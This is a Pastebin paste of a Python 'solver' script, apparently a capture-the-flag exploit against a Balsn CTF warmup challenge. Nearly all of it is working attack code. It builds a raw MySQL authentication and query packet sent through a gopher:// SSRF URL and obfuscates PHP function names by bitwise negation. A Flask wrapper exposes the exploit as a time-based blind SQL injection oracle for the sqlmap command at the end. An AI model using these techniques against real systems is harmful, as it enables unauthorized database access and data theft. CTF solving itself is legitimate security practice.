API tools faq
paste
Advertisement
Guest User

solver.py

a guest
Oct 8th, 2019
312
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.84 KB | None | 0 0
raw download clone embed print report
  1. #coding: utf-8
  2.  
  3. import requests
  4.  
  5. class MySQL():
  6.     print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m"
  7.     user = 'admin' #raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
  8.     encode_user = user.encode("hex")
  9.     user_length = len(user)
  10.     temp = user_length - 4
  11.     length = (chr(0xa3+temp)).encode("hex")
  12.  
  13.     dump = length + "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
  14.     dump +=  encode_user
  15.     dump += "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c"
  16.     dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
  17.     dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"
  18.  
  19.     query = "show databases;";#raw_input("\033[96m" +"Give query to execute: "+ "\033[0m")
  20.  
  21.     auth = dump.replace("\n","")
  22.  
  23.     def encode(self, s):
  24.         a = [s[i:i + 2] for i in range(0, len(s), 2)]
  25.         #return "gopher://127.0.0.1:3306/_%" + "%".join(a)
  26.         return "gopher://127.0.0.1:8787/_%" + "%".join(a)
  27.  
  28.  
  29.     def get_payload(self, query):
  30.         if(query.strip()!=''):
  31.             query = query.encode("hex")
  32.             query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
  33.             query_length = query_length.decode('hex')[::-1].encode('hex')
  34.             pay1 = query_length + "0003" + query
  35.             final = self.encode(self.auth + pay1 + "0100000001")
  36.             return final
  37.         else:
  38.             return encode(self.auth)
  39.  
  40.  
  41. # coding: utf-8
  42. from flask import Flask, render_template, request
  43.  
  44. app = Flask(__name__, template_folder='.')
  45.  
  46. import time
  47. @app.route('/')
  48. def blind():
  49.     username = request.args.get('username')
  50.     url = "http://localhost/gg.php"
  51.     url = "http://warmup.balsnctf.com/"
  52.     def n(s):
  53.         r = ""
  54.         for i in s:
  55.             r += chr(~(ord(i)) & 0xFF)
  56.         r = "~{}".format(r)
  57.         return r
  58.  
  59.     t = '(' + n('getenv') + ')(' +n('HTTP_X') + ')'
  60.     # x = MySQL().get_payload("select IF(TRUE AND (select '1'='{username}'), sleep(10), sleep(0));".format(username=username))
  61.     x = MySQL().get_payload("select id from (select 1 as id)a where id='{username}';".format(username=username))
  62.  
  63.     print repr(x)
  64.     print len(t)
  65.     try:
  66.         r = requests.post(url=url, params = {
  67.             'op' : '-9',
  68.             'Σ>―(#°ω°#)♡→' : t
  69.             },
  70.             cookies = {"PHPSESSID" : "123"},
  71.             headers = {"X": x},
  72.             timeout = 1.5
  73.             )
  74.         return "1"
  75.     except:
  76.  
  77.         time.sleep(4)
  78.         return "0"
  79.     return r.content
  80.  
  81.  
  82.  
  83. if __name__ == "__main__":
  84.     app.run(host='0.0.0.0', debug=True)
  85.  
  86. '''
  87. python sqlmap.py -u "http://localhost:5000/?username=*" --technique=T --dbms=mysql --dbs  --level 1 --time-sec=2
  88. '''
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!